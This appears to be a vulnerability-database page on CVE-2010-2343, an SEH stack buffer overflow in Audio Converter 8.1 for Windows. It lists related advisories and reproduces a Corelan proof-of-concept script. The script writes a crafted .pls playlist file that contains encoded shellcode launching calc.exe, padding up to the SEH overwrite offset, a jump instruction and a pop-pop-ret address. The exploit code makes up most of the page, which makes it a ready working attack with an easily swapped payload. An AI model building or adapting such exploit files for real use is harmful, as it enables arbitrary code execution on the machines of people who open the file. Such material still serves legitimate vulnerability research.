Audio Converter 8.1 Stack Buffer Overflow in Window
Reporter | Title | Published | Views | Family All 11 |
---|---|---|---|---|
Metasploit | Easy CD-DA Recorder PLS Buffer Overflow | 10 Feb 201419:46 | – | metasploit |
Exploit DB | Audio Converter 8.1 - Local Stack Buffer Overflow ROP/WPM | 7 Jun 201000:00 | – | exploitdb |
Exploit DB | Easy CD-DA Recorder - '.pls' Local Buffer Overflow (Metasploit) | 13 Feb 201400:00 | – | exploitdb |
Exploit DB | Easy CD-DA Recorder 2007 - Local Buffer Overflow (SEH) | 7 Jun 201000:00 | – | exploitdb |
0day.today | Easy CD-DA Recorder PLS Buffer Overflow Exploit | 13 Feb 201400:00 | – | zdt |
Packet Storm | Easy CD-DA Recorder PLS Buffer Overflow | 13 Feb 201400:00 | – | packetstorm |
CVE | CVE-2010-2343 | 21 Jun 201015:30 | – | cve |
NVD | CVE-2010-2343 | 21 Jun 201015:30 | – | nvd |
Check Point Advisories | D.R. Software Easy CD-DA Recorder PLS Buffer Overflow (CVE-2010-2343) | 20 Sep 201600:00 | – | checkpoint_advisories |
Prion | Stack overflow | 21 Jun 201015:30 | – | prion |
#***********************************************************************************
# Exploit Title : Audio Converter 8.1 0day Stack Buffer Overflow PoC exploit
# Date : 16/05/2010
# Author : Sud0
# Bug found by : chap0
# Software Link : http://download.cnet.com/Audio-Converter/3000-2140_4-10045287.html
# Version : 8.1
# OS : Windows
# Tested on : XP SP3 En (VirtualBox)
# Type of vuln : SEH
# Thanks to my wife for her support
# Thanks for chap0 for bringing us the game
# Greetz to: Corelan Security Team
# http://www.corelan.be:8800/index.php/security/corelan-team-members/
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
# Do not use this code to do anything illegal !
# Corelan does not want anyone to use this script
# for malicious and/or illegal purposes
# Corelan cannot be held responsible for any illegal use.
#
# Note : you are not allowed to edit/modify this code.
# If you do, Corelan cannot be held responsible for any damages this may cause.
#***********************************************************************************
#code :
print "|------------------------------------------------------------------|\n";
print "| __ __ |\n";
print "| _________ ________ / /___ _____ / /____ ____ _____ ___ |\n";
print "| / ___/ __ \\/ ___/ _ \\/ / __ `/ __ \\ / __/ _ \\/ __ `/ __ `__ \\ |\n";
print "| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |\n";
print "| \\___/\\____/_/ \\___/_/\\__,_/_/ /_/ \\__/\\___/\\__,_/_/ /_/ /_/ |\n";
print "| |\n";
print "| http://www.corelan.be:8800 |\n";
print "| |\n";
print "|-------------------------------------------------[ EIP Hunters ]--|\n\n";
print "[+] Exploit for .... \n";
import socket
#shellcode running calc.exe alpha2 encoded basereg edx
shell="JJJJJJJJJJJJJJJJJ7RYjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIlKXlpUnkxlqx7P7PQ0fOrHpcparLQsLMaUzXPPNXKwOcxBCGKOZpA"
junk="B" * (4432 - len(shell)) #seh overwritten after 4432 bytes
nseh= "\xEB\x06\xEB\x06" # jmp forward
seh= "\xF1\x8E\x03\x10" # nice ppr from audioconv
align="\x61\x61\x61\xff\xE2" # popad / popad / popad / jmp edx
buffer= shell + junk + nseh + seh + "\x90" * 20 + align + "A"* 10000# added some nops after seh
mefile = open('poc.pls','w');
mefile.write(buffer);
mefile.close()
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo